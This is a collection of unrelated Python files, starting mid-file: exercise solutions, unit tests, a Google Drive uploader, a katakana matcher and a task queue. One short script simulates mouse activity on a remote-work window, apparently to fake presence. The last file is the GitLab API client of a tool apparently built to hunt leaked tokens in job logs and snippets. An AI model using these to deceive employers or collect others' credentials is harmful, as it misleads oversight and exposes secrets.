ds.other.include('fluid')
# Set time stepper
ds.timestep.setTmax(tMax)
ds.timestep.setNt(Nt)
ds.output.setTiming(stdout=True, file=True)
ds.output.setFilename('output.h5')
# Save settings to HDF5 file
ds.save('dream_settings.h5')
|
# Copyright Ramón Vila Ferreres - 2021
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from typing import *
import dateutil.parser
from datetime import datetime
class CalendarEvent:
""" Represents a single calendar event in several formats """
def __init__(self, configuration: dict, event: dict):
# Here for ease of access and readability
event_start = self.__parse_datestring(event["start"])
event_end = self.__parse_datestring(event["end"])
self.configuration = configuration
# Parse data
self.event: dict = {
"description": event["description"].replace("\n", ""),
"subject" : event['title'].replace("\n", ""),
"start_date" : event_start.strftime("%m/%d/%Y"),
"start_time" : event_start.strftime("%H:%M:%S"),
"end_date" : event_end.strftime("%m/%d/%Y"),
"end_time" : event_end.strftime("%H:%M:%S"),
}
def __parse_datestring(self, datestring: str) -> datetime:
return dateutil.parser.isoparse(datestring)
def to_list(self) -> List[Any]:
""" Returns event components sorted in an array """
csv_headers = self.configuration["parser"]["formats"]["csv"]["headers"].split(",")
# Replace the value in its original position to follow the specification order
values: dict = { key : self.event[key.lower().replace(" ", "_")] for key in csv_headers }
return list(values.values()) |
lamb = lambda x: x ** 3
print(lamb(3))
def writer():
title = 'Sir'
name = (lambda x: title + ' ' + x)
return name
w = writer()
print(w('Breno Polanski'))
L = [lambda x: x ** 2, lambda x: x ** 3, lambda x: x**4]
for f in L:
print(f(3)) |
# -*- encoding:utf-8 -*-
# __author__=='Gan'
# Given a string s, partition s such that every substring of the partition is a palindrome.
# Return all possible palindrome partitioning of s.
# For example, given s = "aab",
# Return
# [
# ["aa","b"],
# ["a","a","b"]
# ]
# 22 / 22 test cases passed.
# Status: Accepted
# Runtime: 175 ms
# Your runtime beats 42.93 % of python submissions.
class Solution(object):
def partition(self, s):
"""
:type s: str
:rtype: List[List[str]]
"""
ans = []
def generate(s, path):
if not s:
ans.append(list(path))
return
for i in range(1, len(s) + 1):
if is_palindrome(s[:i]):
generate(s[i:], (path + [s[:i]]))
def is_palindrome(str_):
return str_ == str_[::-1]
generate(s, [])
return ans
if __name__ == '__main__':
print(Solution().partition('aab'))
|
def fibonacci(n):
"""
This function returns the nth value of fibonacci series
Input: integer (n)
Output: fibonacci[n]
"""
if n == 0:
return 0
if (n==1 or n ==2):
return 1
else:
return fibonacci(n-1) + fibonacci(n-2)
def lucas(n):
"""
This function returns the nth value of lucas series
Input: integer (n)
Output: lucas[n]
"""
if n == 0:
return 2
if n==1 :
return 1
else:
return lucas(n-1) + lucas(n-2)
def sum_series (n,first=0,second=1):
"""
This function returns the nth value of user custom series in which each element is the sum of the previous two elements, first and second elements are user defined
Input: integer, first element (integer) optional, second element (integer) optional
Output: nth element of the resulting series
"""
if n == 0:
return first
if n == 1 :
return second
else:
return sum_series(n-1,first,second) + sum_series(n-2,first,second)
|
import os.path
import pickle
import sys
from google.auth.transport.requests import Request
from google_auth_oauthlib.flow import InstalledAppFlow
from googleapiclient.discovery import build
from googleapiclient.http import MediaFileUpload
from termcolor import colored
# ================ CONFIG ================
# ID of Google Drive folder to upload to
DRIVE_FOLDER_ID = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
# If file with given name already exists in folder,
# Add revision instead of new file.
REVISE_EXISTING = True
# MIMETYPE of file uploading (can be blank)
MIMETYPE = "" # eg, "application/json" or "text/csv"
# =========================================
# formatting
boldify = lambda x: colored(x, attrs=["bold"])
blueify = lambda x: colored(x, "blue", attrs=["bold"])
greenify = lambda x: colored(x, "green", attrs=["bold"])
redify = lambda x: colored(x, "red", attrs=["bold"])
def prompt(text, options="y/n", default="y"):
"""
Helper function for dealing with user prompts.
- Prompts user for input
- Formats the options, highlighting the default.
- Returns the default if input is empty
"""
options = options.replace(default, blueify(default))
msg = f"{text} [{options}]: "
user_input = input(msg)
if user_input:
return user_input
else:
return default
class Uploader:
"""For uploading files to Google Drive"""
scopes = ["https://www.googleapis.com/auth/drive.file"]
drive_folder_id = DRIVE_FOLDER_ID
mimetype = MIMETYPE or None
def __init__(self):
self.service = self.get_creds()
def get_creds(self):
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first time.
if os.path.exists("token.pickle"):
with open("token.pickle", "rb") as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
try:
flow = InstalledAppFlow.from_client_secrets_file(
"credentials.json", self.scopes
)
except FileNotFoundError:
msg = (
f"\n{redify('Error!')} "
+ "You must create a credentials.json file.\n"
+ " See quickstart guide: https://developers.google.com/drive/api/v3/quickstart/python\n"
)
print(msg)
sys.exit()
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open("token.pickle", "wb") as token:
pickle.dump(creds, token)
return build("drive", "v3", credentials=creds)
def upload_to_drive(self, filename, upload_name):
if REVISE_EXISTING:
items = self._check_for_existing(filename, upload_name)
if items:
existing_item_id = items[0]["id"]
return self._update_existing(filename, upload_name, existing_item_id)
return self._upload_new(filename, upload_name)
def _check_for_existing(self, filename, upload_name):
q = f"name = '{upload_name}' and '{self.drive_folder_id}' in parents and trashed = false"
results = self.service.files().list(q=q, fields="files(id, name)").execute()
items = results.get("files", [])
return items
def _update_existing(self, filename, upload_name, existing_item_id):
print("\n> Updating existing file...")
file_metadata = dict(name=upload_name)
media = MediaFileUpload(filename, mimetype=self.mimetype)
file = (
self.service.files()
.update(
fileId=existing_item_id,
body=file_metadata,
media_body=media,
fields="id",
)
.execute()
)
return file.get("id")
def _upload_new(self, filename, upload_name):
print("\n> Adding new file...")
file_metadata = dict(name=upload_name, parents=[self.drive_folder_id])
media = MediaFileUpload(filename, mimetype=self.mimetype)
file = (
self.service.files()
.create(
body=file_metadata,
media_body=media,
fields="id",
)
.execute()
)
return file.get("id")
def upload(filename):
"""Prompt for new file name, then upload to drive"""
try:
default_name = filename.split("/")[-1]
except IndexError:
default_name = ""
while True:
new_name = prompt("> Upload name", options=default_name, default=default_name)
confirm = prompt(
f"> File will be uploaded as `{new_name}`. Okay?",
options="y/n",
default="y",
)
if confirm.lower() == "y":
break
# upload to drive
uploader = Uploader()
file_id = uploader.upload_to_drive(filename, new_name)
if file_id:
print(greenify("> Success.\n"))
if __name__ == "__main__":
try:
filename = sys.argv[1]
except IndexError:
print("Error! No filename given.")
sys.exit()
print("\n(Default option is given in blue)\n")
confirm = prompt(
f"> Upload `{filename}` to Google Drive?", options="y/n", default="y"
)
if confirm.lower() == "y":
upload(filename)
else:
print(redify("Aborted.\n"))
|
import unittest
import sbol3
import tyto
import labop
import uml
from labop.execution_engine import ExecutionEngine
from labop.primitive_execution import initialize_primitive_compute_output
from labop_convert import MarkdownSpecialization
from labop_convert.behavior_specialization import DefaultBehaviorSpecialization
PARAMETER_IN = "http://bioprotocols.org/uml#in"
PARAMETER_OUT = "http://bioprotocols.org/uml#out"
labop.import_library("sample_arrays")
labop.import_library("plate_handling")
labop.import_library("spectrophotometry")
class TestProtocolOutputs(unittest.TestCase):
def setUp(self):
doc = sbol3.Document()
protocol = labop.Protocol("foo")
doc.add(protocol)
plate_spec = labop.ContainerSpec(
"my_absorbance_measurement_plate",
name="my absorbance measurement plate",
queryString="cont:Plate96Well",
prefixMap={
"cont": "https://sift.net/container-ontology/container-ontology#"
},
)
plate = protocol.primitive_step("EmptyContainer", specification=plate_spec)
target_wells = protocol.primitive_step(
"PlateCoordinates", source=plate.output_pin("samples"), coordinates=f"A1"
)
measure_absorbance = protocol.primitive_step(
"MeasureAbsorbance",
samples=target_wells.output_pin("samples"),
wavelength=sbol3.Measure(600, tyto.OM.nanometer),
)
self.protocol = protocol
self.output = measure_absorbance.output_pin("measurements")
# @unittest.expectedFailure
# def test_protocol_outputs_not_designated(self):
# # TODO: catch output parameters that aren't explicitly designated
# # rather than breaking cryptically
# agent = sbol3.Agent("test_agent")
# ee = ExecutionEngine(specializations=[MarkdownSpecialization("test_LUDOX_markdown.md")])
# ex = ee.execute(self.protocol, agent, id="test_execution", parameter_values=[])
def test_protocol_outputs(self):
# This test confirms generation of designated output objects
self.protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=self.output,
)
agent = sbol3.Agent("test_agent")
ee = ExecutionEngine(
specializations=[MarkdownSpecialization("test_LUDOX_markdown.md")]
)
ex = ee.execute(self.protocol, agent, id="test_execution", parameter_values=[])
self.assertTrue(isinstance(ex.parameter_values[0].value, uml.LiteralReference))
self.assertTrue(
isinstance(ex.parameter_values[0].value.value.lookup(), labop.Dataset)
)
if __name__ == "__main__":
unittest.main()
|
santaX = 0
santaY = 0
robotX = 0
robotY = 0
locations = [(0, 0)]
ticker = False
instructions = ""
with open("inputData.txt", "r") as infile:
for line in infile:
instructions += line
for i in instructions:
y = 0
x = 0
if i == "^":
y = 1
elif i == "v":
y = -1
elif i == "<":
x = 1
elif i == ">":
x = -1
if ticker:
ticker = False
santaX += x
santaY += y
location = (santaX, santaY)
if location not in locations:
locations.append(location)
else:
ticker = True
robotX += x
robotY += y
location = (robotX, robotY)
if location not in locations:
locations.append(location)
print(len(locations))
|
#문자열변수[start:end-1]
a = "Life is too short, You need Python"
book = a[0:7] #0 ~ 6번 인덱스까지 슬라이싱
print(book)
book = a[12:17]
print(book)
print(a[0:7] + " " + a[12:17]) |
"""
Unit test for EC2 ipa.
"""
import unittest
import mock
from treadmill.infra.setup.ipa import IPA
from treadmill.infra import constants
class IPATest(unittest.TestCase):
"""Tests EC2 ipa setup."""
@mock.patch('time.time', mock.Mock(return_value=1000))
@mock.patch('treadmill.infra.subnet.Subnet')
@mock.patch('treadmill.infra.get_iam_role')
@mock.patch('treadmill.infra.configuration.IPA')
@mock.patch('treadmill.infra.connection.Connection')
@mock.patch('treadmill.infra.vpc.VPC')
@mock.patch('treadmill.infra.instances.Instances')
def test_setup_ipa(self, InstancesMock,
VPCMock, ConnectionMock, IPAConfigurationMock,
get_iam_role_mock, SubnetMock):
ConnectionMock.context.domain = 'foo.bar'
instance_mock = mock.Mock(metadata={'PrivateIpAddress': '1.1.1.1'})
instance_mock.name = 'ipa'
instance_mock.running_status = mock.Mock(return_value='passed')
instances_mock = mock.Mock(instances=[instance_mock])
InstancesMock.create = mock.Mock(return_value=instances_mock)
conn_mock = ConnectionMock('route53')
_vpc_id_mock = 'vpc-id'
_vpc_mock = VPCMock(id=_vpc_id_mock)
_vpc_mock.secgroup_ids = ['secgroup_id']
_vpc_mock.gateway_ids = [123]
conn_mock.describe_instance_status = mock.Mock(
return_value={
'InstanceStatuses': [
{'InstanceStatus': {'Details': [{'Status': 'passed'}]}}
]
}
)
_private_ip = '1.1.1.1'
_subnet_mock = mock.Mock(
persisted=False,
id='subnet-id',
vpc_id=_vpc_id_mock,
name='subnet-name',
get_instances=mock.Mock(return_value=instances_mock)
)
SubnetMock.get = mock.Mock(return_value=_subnet_mock)
_ipa_configuration_mock = IPAConfigurationMock()
_ipa_configuration_mock.get_userdata = mock.Mock(
return_value='user-data-script'
)
ipa = IPA(
name='ipa',
vpc_id=_vpc_id_mock,
)
ipa.setup(
image='foo-123',
count=1,
cidr_block='cidr-block',
key='some-key',
tm_release='release',
ipa_admin_password='ipa-admin-password',
instance_type='small',
proid='foobar',
subnet_name='sub-name'
)
get_iam_role_mock.assert_called_once_with(
name=constants.IPA_EC2_IAM_ROLE,
create=True
)
instance_mock.running_status.assert_called_once_with(refresh=True)
_subnet_mock.refresh.assert_called()
_subnet_mock.get_instances.assert_called_once_with(
refresh=True,
role='IPA'
)
_vpc_mock.create_security_group.assert_called_once()
_vpc_mock.add_secgrp_rules.assert_called_once()
_vpc_mock.delete_dhcp_options.assert_called_once()
self.assertCountEqual(
_vpc_mock.associate_dhcp_options.mock_calls,
[
mock.mock.call(default=True),
mock.mock.call([{
'Key': 'domain-name-servers', 'Values': [_private_ip]
}])
]
)
self.assertEqual(ipa.subnet.instances, instances_mock)
InstancesMock.create.assert_called_once_with(
image='foo-123',
name='ipa1-1000.foo.bar',
count=1,
subnet_id='subnet-id',
instance_type='small',
key_name='some-key',
secgroup_ids=['secgroup_id'],
user_data='user-data-script',
role='IPA'
)
_vpc_mock.load_security_group_ids.assert_called_once_with(
sg_names=['sg_common', 'ipa_secgrp']
)
_subnet_mock.persist.assert_called_once_with(
cidr_block='cidr-block',
gateway_id=123
)
self.assertEqual(
IPAConfigurationMock.mock_calls[1],
mock.mock.call(
ipa_admin_password='ipa-admin-password',
tm_release='release',
hostname='ipa1-1000.foo.bar',
vpc=_vpc_mock,
proid='foobar'
)
)
_ipa_configuration_mock.get_userdata.assert_called_once()
@mock.patch('treadmill.infra.subnet.Subnet')
@mock.patch('treadmill.infra.connection.Connection')
@mock.patch('treadmill.infra.vpc.VPC')
def test_ipa_destroy(self, VPCMock, ConnectionMock, SubnetMock):
ConnectionMock.context.domain = 'foo.bar'
_subnet_mock = SubnetMock(
subnet_name='subnet-name'
)
_vpc_id_mock = 'vpc-id'
_vpc_mock = VPCMock(id=_vpc_id_mock)
_vpc_mock.secgroup_ids = ['secgroup_id']
_instance = mock.Mock(private_ip='1.1.1.1')
_instance.name = 'ipa'
_subnet_mock.instances = mock.Mock(instances=[
_instance
])
ipa = IPA(
vpc_id='vpc-id',
name='ipa-setup'
)
ipa.subnet = _subnet_mock
ipa.destroy(
subnet_name='subnet-name'
)
_subnet_mock.destroy.assert_called_once_with(role='IPA')
_vpc_mock.delete_security_groups.assert_called_once_with(
sg_names=['ipa_secgrp']
)
|
# -*- coding: cp932 -*-
"""このソースコードは blanco Frameworkによって自動生成されています。
"""
class SampleHanKatakanaCharacterGroup:
"""半角カタカナのサンプル。blancoCharacterGroupの実装には影響しません。
"""
def __init__(self, encoding='cp932'):
"""クラス初期化メソッド
self -- このメソッドを含むクラス自身。
encoding='cp932' -- エンコーディング。デフォルトは'cp932'
"""
self.encoding = encoding
#end
def match(self, argCheck):
"""文字グループに含まれる文字であるかどうかを判定します。
self -- このメソッドを含むクラス自身。
argCheck -- チェックを行いたい文字。
return -- 文字グループに含まれていればture。グループに含まれない文字であればfalse。
"""
argCheckUnicode = unicode(argCheck, self.encoding)
# No.2
# 説明:a1: 句読点
# 0xa1 (Windows-31J)
# 0xff61 (UTF-16BE)
if argCheckUnicode == u'。':
return True
#end
# No.3
# 説明:a2: 半角のカギカッコ。
# 0xa2 (Windows-31J)
# 0xff62 (UTF-16BE)
if argCheckUnicode == u'「':
return True
#end
# No.4
# 説明:a3: 半角のカギカッコ。
# 0xa3 (Windows-31J)
# 0xff63 (UTF-16BE)
if argCheckUnicode == u'」':
return True
#end
# No.5
# 説明:a4: 句読点
# 0xa4 (Windows-31J)
# 0xff64 (UTF-16BE)
if argCheckUnicode == u'、':
return True
#end
# No.6
# 説明:a5: 半角の中黒
# 0xa5 (Windows-31J)
# 0xff65 (UTF-16BE)
if argCheckUnicode == u'・':
return True
#end
# No.8
# 説明:a7: 小さいカタカナ。ァ。
# 0xa7 (Windows-31J)
# 0xff67 (UTF-16BE)
if argCheckUnicode == u'ァ':
return True
#end
# No.9
# 説明:a8: 小さいカタカナ
# 0xa8 (Windows-31J)
# 0xff68 (UTF-16BE)
if argCheckUnicode == u'ィ':
return True
#end
# No.10
# 説明:a9: 小さいカタカナ
# 0xa9 (Windows-31J)
# 0xff69 (UTF-16BE)
if argCheckUnicode == u'ゥ':
return True
#end
# No.11
# 説明:aa: 小さいカタカナ
# 0xaa (Windows-31J)
# 0xff6a (UTF-16BE)
if argCheckUnicode == u'ェ':
return True
#end
# No.12
# 説明:ab: 小さいカタカナ
# 0xab (Windows-31J)
# 0xff6b (UTF-16BE)
if argCheckUnicode == u'ォ':
return True
#end
# No.13
# 説明:ac: 小さいカタカナ
# 0xac (Windows-31J)
# 0xff6c (UTF-16BE)
if argCheckUnicode == u'ャ':
return True
#end
# No.14
# 説明:ad: 小さいカタカナ
# 0xad (Windows-31J)
# 0xff6d (UTF-16BE)
if argCheckUnicode == u'ュ':
return True
#end
# No.15
# 説明:ae: 小さいカタカナ。ョ。
# 0xae (Windows-31J)
# 0xff6e (UTF-16BE)
if argCheckUnicode == u'ョ':
return True
#end
# No.16
# 説明:af: 小さいカタカナ。ッ。ョの次に定義しています。
# 0xaf (Windows-31J)
# 0xff6f (UTF-16BE)
if argCheckUnicode == u'ッ':
return True
#end
# No.17
# 説明:b0: 半角の伸ばす。−。
# 0xb0 (Windows-31J)
# 0xff70 (UTF-16BE)
if argCheckUnicode == u'ー':
return True
#end
# No.18
# 説明:b1: カタカナ。ア。
# 0xb1 (Windows-31J)
# 0xff71 (UTF-16BE)
if argCheckUnicode == u'ア':
return True
#end
# No.19
# 説明:b2: カタカナ
# 0xb2 (Windows-31J)
# 0xff72 (UTF-16BE)
if argCheckUnicode == u'イ':
return True
#end
# No.20
# 説明:b3: カタカナ
# 0xb3 (Windows-31J)
# 0xff73 (UTF-16BE)
if argCheckUnicode == u'ウ':
return True
#end
# No.21
# 説明:b4: カタカナ
# 0xb4 (Windows-31J)
# 0xff74 (UTF-16BE)
if argCheckUnicode == u'エ':
return True
#end
# No.22
# 説明:b5: カタカナ
# 0xb5 (Windows-31J)
# 0xff75 (UTF-16BE)
if argCheckUnicode == u'オ':
return True
#end
# No.23
# 説明:b6: カタカナ
# 0xb6 (Windows-31J)
# 0xff76 (UTF-16BE)
if argCheckUnicode == u'カ':
return True
#end
# No.24
# 説明:b7: カタカナ
# 0xb7 (Windows-31J)
# 0xff77 (UTF-16BE)
if argCheckUnicode == u'キ':
return True
#end
# No.25
# 説明:b8: カタカナ
# 0xb8 (Windows-31J)
# 0xff78 (UTF-16BE)
if argCheckUnicode == u'ク':
return True
#end
# No.26
# 説明:b9: カタカナ
# 0xb9 (Windows-31J)
# 0xff79 (UTF-16BE)
if argCheckUnicode == u'ケ':
return True
#end
# No.27
# 説明:ba: カタカナ
# 0xba (Windows-31J)
# 0xff7a (UTF-16BE)
if argCheckUnicode == u'コ':
return True
#end
# No.28
# 説明:bb: カタカナ
# 0xbb (Windows-31J)
# 0xff7b (UTF-16BE)
if argCheckUnicode == u'サ':
return True
#end
# No.29
# 説明:bc: カタカナ
# 0xbc (Windows-31J)
# 0xff7c (UTF-16BE)
if argCheckUnicode == u'シ':
return True
#end
# No.30
# 説明:bd: カタカナ
# 0xbd (Windows-31J)
# 0xff7d (UTF-16BE)
if argCheckUnicode == u'ス':
return True
#end
# No.31
# 説明:be: カタカナ
# 0xbe (Windows-31J)
# 0xff7e (UTF-16BE)
if argCheckUnicode == u'セ':
return True
#end
# No.32
# 説明:bf: カタカナ
# 0xbf (Windows-31J)
# 0xff7f (UTF-16BE)
if argCheckUnicode == u'ソ':
return True
#end
# No.33
# 説明:c0: カタカナ
# 0xc0 (Windows-31J)
# 0xff80 (UTF-16BE)
if argCheckUnicode == u'タ':
return True
#end
# No.34
# 説明:c1: カタカナ
# 0xc1 (Windows-31J)
# 0xff81 (UTF-16BE)
if argCheckUnicode == u'チ':
return True
#end
# No.35
# 説明:c2: カタカナ
# 0xc2 (Windows-31J)
# 0xff82 (UTF-16BE)
if argCheckUnicode == u'ツ':
return True
#end
# No.36
# 説明:c3: カタカナ
# 0xc3 (Windows-31J)
# 0xff83 (UTF-16BE)
if argCheckUnicode == u'テ':
return True
#end
# No.37
# 説明:c4: カタカナ
# 0xc4 (Windows-31J)
# 0xff84 (UTF-16BE)
if argCheckUnicode == u'ト':
return True
#end
# No.38
# 説明:c5: カタカナ
# 0xc5 (Windows-31J)
# 0xff85 (UTF-16BE)
if argCheckUnicode == u'ナ':
return True
#end
# No.39
# 説明:c6: カタカナ
# 0xc6 (Windows-31J)
# 0xff86 (UTF-16BE)
if argCheckUnicode == u'ニ':
return True
#end
# No.40
# 説明:c7: カタカナ
# 0xc7 (Windows-31J)
# 0xff87 (UTF-16BE)
if argCheckUnicode == u'ヌ':
return True
#end
# No.41
# 説明:c8: カタカナ
# 0xc8 (Windows-31J)
# 0xff88 (UTF-16BE)
if argCheckUnicode == u'ネ':
return True
#end
# No.42
# 説明:c9: カタカナ
# 0xc9 (Windows-31J)
# 0xff89 (UTF-16BE)
if argCheckUnicode == u'ノ':
return True
#end
# No.43
# 説明:ca: カタカナ
# 0xca (Windows-31J)
# 0xff8a (UTF-16BE)
if argCheckUnicode == u'ハ':
return True
#end
# No.44
# 説明:cb: カタカナ
# 0xcb (Windows-31J)
# 0xff8b (UTF-16BE)
if argCheckUnicode == u'ヒ':
return True
#end
# No.45
# 説明:cc: カタカナ
# 0xcc (Windows-31J)
# 0xff8c (UTF-16BE)
if argCheckUnicode == u'フ':
return True
#end
# No.46
# 説明:cd: カタカナ
# 0xcd (Windows-31J)
# 0xff8d (UTF-16BE)
if argCheckUnicode == u'ヘ':
return True
#end
# No.47
# 説明:ce: カタカナ
# 0xce (Windows-31J)
# 0xff8e (UTF-16BE)
if argCheckUnicode == u'ホ':
return True
#end
# No.48
# 説明:cf: カタカナ
# 0xcf (Windows-31J)
# 0xff8f (UTF-16BE)
if argCheckUnicode == u'マ':
return True
#end
# No.49
# 説明:d0: カタカナ
# 0xd0 (Windows-31J)
# 0xff90 (UTF-16BE)
if argCheckUnicode == u'ミ':
return True
#end
# No.50
# 説明:d1: カタカナ
# 0xd1 (Windows-31J)
# 0xff91 (UTF-16BE)
if argCheckUnicode == u'ム':
return True
#end
# No.51
# 説明:d2: カタカナ
# 0xd2 (Windows-31J)
# 0xff92 (UTF-16BE)
if argCheckUnicode == u'メ':
return True
#end
# No.52
# 説明:d3: カタカナ
# 0xd3 (Windows-31J)
# 0xff93 (UTF-16BE)
if argCheckUnicode == u'モ':
return True
#end
# No.53
# 説明:d4: カタカナ
# 0xd4 (Windows-31J)
# 0xff94 (UTF-16BE)
if argCheckUnicode == u'ヤ':
return True
#end
# No.54
# 説明:d5: カタカナ
# 0xd5 (Windows-31J)
# 0xff95 (UTF-16BE)
if argCheckUnicode == u'ユ':
return True
#end
# No.55
# 説明:d6: カタカナ
# 0xd6 (Windows-31J)
# 0xff96 (UTF-16BE)
if argCheckUnicode == u'ヨ':
return True
#end
# No.56
# 説明:d7: カタカナ
# 0xd7 (Windows-31J)
# 0xff97 (UTF-16BE)
if argCheckUnicode == u'ラ':
return True
#end
# No.57
# 説明:d8: カタカナ
# 0xd8 (Windows-31J)
# 0xff98 (UTF-16BE)
if argCheckUnicode == u'リ':
return True
#end
# No.58
# 説明:d9: カタカナ
# 0xd9 (Windows-31J)
# 0xff99 (UTF-16BE)
if argCheckUnicode == u'ル':
return True
#end
# No.59
# 説明:da: カタカナ
# 0xda (Windows-31J)
# 0xff9a (UTF-16BE)
if argCheckUnicode == u'レ':
return True
#end
# No.60
# 説明:db: カタカナ
# 0xdb (Windows-31J)
# 0xff9b (UTF-16BE)
if argCheckUnicode == u'ロ':
return True
#end
# No.61
# 説明:dc: カタカナ。ワ。
# 0xdc (Windows-31J)
# 0xff9c (UTF-16BE)
if argCheckUnicode == u'ワ':
return True
#end
# No.62
# 説明:a6: カタカナ。ヲ。MS932におけるコード順としては 小さいアより前に位置します。
# 0xa6 (Windows-31J)
# 0xff66 (UTF-16BE)
if argCheckUnicode == u'ヲ':
return True
#end
# No.63
# 説明:dd: カタカナ。ン。
# 0xdd (Windows-31J)
# 0xff9d (UTF-16BE)
if argCheckUnicode == u'ン':
return True
#end
# No.64
# 説明:de: 濁音
# 0xde (Windows-31J)
# 0xff9e (UTF-16BE)
if argCheckUnicode == u'゙':
return True
#end
# No.65
# 説明:df: 濁音
# 0xdf (Windows-31J)
# 0xff9f (UTF-16BE)
if argCheckUnicode == u'゚':
return True
#end
return False
#end
def matchAll(self, argCheck):
"""与えられた文字列が、全て文字グループに含まれる文字であるかどうかを判定します。
self -- このメソッドを含むクラス自身。
argCheck -- チェックを行いたい文字列。
return -- 全ての文字が文字グループに含まれていればture。グループに含まれない文字が含まれていればfalse。
"""
if argCheck is None:
raise ValueError, "メソッド[matchAll]のパラメータ[argCheck]にnullが与えられました。しかし、このパラメータにnullを与えることはできません。"
#end
argCheckUnicode = unicode(argCheck, self.encoding)
for arg in argCheckUnicode:
if self.match(arg.encode(self.encoding)) == False:
return False
#end
#end
return True
#end
def matchAny(self, argCheck):
"""与えられた文字列が、文字グループに含まれる文字をひとつでも含んでいるかどうかを判定します。
self -- このメソッドを含むクラス自身。
argCheck -- チェックを行いたい文字列。
return -- 文字グループに含まれている文字をひとつでも含んでいればture。グループに含まれる文字をひとつも含まない場合はfalse。
"""
if argCheck is None:
raise ValueError, "メソッド[matchAny]のパラメータ[argCheck]にnullが与えられました。しかし、このパラメータにnullを与えることはできません。"
#end
argCheckUnicode = unicode(argCheck, self.encoding)
for arg in argCheckUnicode:
if self.match(arg.encode(self.encoding)):
return True
#end
#end
return False
#end
#end
|
import mouse # pip install mouse
import pygetwindow as gw # pip install pygetwindow
import time
AUORemoteWindow = gw.getWindowsWithTitle('iconnectts2.auo.com')[0]
while(1):
if AUORemoteWindow.isMaximized:
print("Working from home now")
else:
AUORemoteWindow.maximize()
mouse.right_click()
time.sleep(0.5)
AUORemoteWindow.minimize()
time.sleep(600)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from head import *
class Task():
"""
任务类型
"""
def __init__(self, birth_type = BIRTH_TYPE_AUTO, frame = '', birth_time = datetime.now()):
#: 任务初始方向(UP/DOWN)
self.birth_type = birth_type
#: 来源套接字的文件描述符(用于到连接字典查询相应连接句柄)
self.birth_fileno = -1
#: 版本号
self.version = -1
#: 任务数据包
self.frame = frame
#: 生成时间
self.birth_time = datetime.now()
#:任务状态
self.state = TASK_READY
#:生成任务ID
self.gene_id()
def gene_id(self):
GlobalTaskId.lock.acquire()
#:任务ID
if GlobalTaskId.global_task_id > MAX_TASK_ID:
GlobalTaskId.global_task_id = 0
self.id = GlobalTaskId.global_task_id
GlobalTaskId.global_task_id += 1
GlobalTaskId.lock.release()
class TaskList():
#: 任务列表
task_list = {}
def add(self, one_task):
"""
增加任务
:param one_task: 待插入的任务,类型为 Task 类
:rtype: 成功SUC,失败FAI
"""
if task_condition.acquire():
self.task_list[one_task.id] = one_task
task_condition.notifyAll()
task_condition.release()
log_msg = 'One task added'
log_handler.debug(log_msg)
return SUC
else:
log_msg = 'Adding one task failed, task_id: %d' %(one_task.id)
log_handler.error(log_msg)
return FAI
def remove(self, task_id):
"""
删除任务
:param task_id: 待删除的任务号
:rtype: NULL
"""
# ERROR************
try:
self.task_list.pop(task_id)
log_msg = '[ Task Deliver ] Remove one task, id : %d' %(task_id)
# log_manager.add_work_log(log_msg, sys._getframe().f_code.co_name)
log_handler.work(log_msg)
except KeyError:
log_msg = 'In remove task key error'
log_handler.error(log_msg)
class GlobalTaskId:
global_task_id = 0
lock = threading.Lock()
task_condition = threading.Condition(threading.Lock())
global_task_list = TaskList()
if __name__ == "__main__":
task1 = Task()
task2 = Task()
task3 = Task()
task1.task_id = 1
task2.task_id = 2
task3.task_id = 3
global_task_list.add(task1)
global_task_list.add(task2)
global_task_list.add(task3)
print len(global_task_list.task_list)
for key in global_task_list.task_list.keys():
print 'To remove task %d' %key
global_task_list.remove(key)
print len(global_task_list.task_list)
|
import os
import re
from logging import warning, error
import requests
from api import http
from utilities import types, constants
def build_session():
command_args = types.Arguments()
def get_cert():
if not command_args.cert:
return True
return command_args.cert
def get_proxies():
proxy_url = command_args.proxy
if not proxy_url:
return {}
return {
"http": proxy_url,
"https": proxy_url,
}
session = requests.session()
session.headers.update({
"PRIVATE-TOKEN": os.getenv(constants.Environment.gitlab_api_token()),
"USER-AGENT": "token-hunter"
})
session.proxies = get_proxies()
session.verify = get_cert()
return session
def args():
return types.Arguments()
class GitLab:
def __init__(self, base_url, session_builder=build_session, get_args=args):
self.http = http.Http(session_builder)
self.base_url = base_url + "/api/v4"
self.visited_urls = {}
self.next_page_regex = re.compile(r'<([^<>]*?)>; rel="next"')
self.args = get_args()
def get_project_details(self, project):
return self.get('{}/projects/{}'.format(self.base_url, project))
def get_merge_request_comments(self, project_id, mr_id):
return self.get('{}/projects/{}/merge_requests/{}/discussions'.format(self.base_url, project_id, mr_id))
def get_jobs(self, project_id):
return self.get('{}/projects/{}/jobs?scope=success&scope=failed'.format(self.base_url, project_id))
def get_job_logs(self, project_id, job_id):
return self.get('{}/projects/{}/jobs/{}/trace'.format(self.base_url, project_id, job_id))
def get_merge_requests(self, project_id):
return self.get('{}/projects/{}/merge_requests'.format(self.base_url, project_id))
def get_issue_comments(self, project_id, issue_id):
return self.get('{}/projects/{}/issues/{}/discussions'.format(self.base_url, project_id, issue_id))
def get_issues(self, project_id):
return self.get('{}/projects/{}/issues'.format(self.base_url, project_id))
def get_project_snippets(self, project):
return self.get('{}/projects/{}/snippets'.format(self.base_url, project))
def get_snippet_raw(self, snippet_id):
return self.get('{}/snippets/{}/raw?line_ending=raw'.format(self.base_url, snippet_id))
def get_personal_projects(self, member):
return self.get('{}/users/{}/projects'.format(self.base_url, member))
def get_group_projects(self, group):
return self.get('{}/groups/{}/projects'.format(self.base_url, group))
